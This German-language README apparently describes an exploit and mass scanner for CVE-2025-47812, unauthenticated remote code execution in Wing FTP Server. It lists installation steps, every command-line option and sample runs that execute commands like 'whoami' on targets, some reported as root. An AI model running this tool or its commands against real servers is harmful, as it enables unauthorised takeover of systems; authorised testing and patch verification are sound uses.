
Exploit und Scanner für CVE-2025-47812, der auf nicht authentifizierte Remote-Codeausführung im Wing FTP Server abzielt und Einzelziel, Massen-Scanning, Proxy und mehrere Ausgabeformate unterstützt.
Verbesserter Exploit für Wing FTP Server CVE-2025-47812 - Unauthenticated Remote Code Execution (RCE)
Klone dieses Repository und wechsle in das Verzeichnis:
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt
Oder lade einfach das Skript CVE-2025-47812.py herunter und führe es aus.
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]
Exploit für Wing FTP Server CVE-2025-47812 - verbesserte Version
Optionen:
-h, --help zeigt diese Hilfe an
-u URL, --url URL Ziel-URL (z.B. http://192.168.1.100:5466)
-f FILE, --file FILE Datei mit URL-Liste (eine pro Zeile)
-c COMMAND, --command COMMAND
auszuführender Befehl (Standard: echo CVE-2025-47812)
-U USERNAME, --username USERNAME
Benutzername (Standard: anonymous)
-P PASSWORD, --password PASSWORD
Passwort (Standard: leer)
--check Prüfmodus: prüft nur, ob angreifbar (verwendet harmlosen Befehl)
-v, --verbose ausführlicher Modus (zeigt Details)
--proxy PROXY Proxy (z.B. http://127.0.0.1:8080)
--timeout TIMEOUT Timeout in Sekunden (Standard: 10)
-o OUTPUT, --output OUTPUT
Ausgabedatei zum Speichern der Ergebnisse
--output-format {txt,json,csv}
Ausgabeformat (Standard: txt)
--threads THREADS Anzahl der Threads zum Scannen mehrerer Ziele (Standard: 5)
--no-progress Fortschrittsbalken ausblenden
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check
python CVE-2025-47812.py -f targets.txt --threads 10 -o ergebnisse.json --output-format json
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v
Die Datei muss eine URL pro Zeile enthalten, zum Beispiel:
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.myserver.com:5466
http://192.168.1.10:5466 - VERWUNDBAR - Benutzer: root
http://192.168.1.11:5466 - SICHER - Nicht verwundbar
[
{
"target": "http://192.168.1.10:5466",
"vulnerable": true,
"info": "usuario: root"
}
]
Target,Vulnerable,Info
http://192.168.1.10:5466,True,usuario: root
Dieser Exploit dient ausschließlich zu Bildungszwecken und autorisierten Sicherheitstests. Die unbefugte Nutzung dieses Tools gegen Systeme ohne ausdrückliche Zustimmung ist illegal und kann schwerwiegende rechtliche Konsequenzen haben. Die Autoren übernehmen keine Haftung für etwaigen Missbrauch.
Wenn dir diese Arbeit gefällt, vergiss nicht, ihr einen Stern ⭐ auf GitHub zu geben!
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für weitere Details.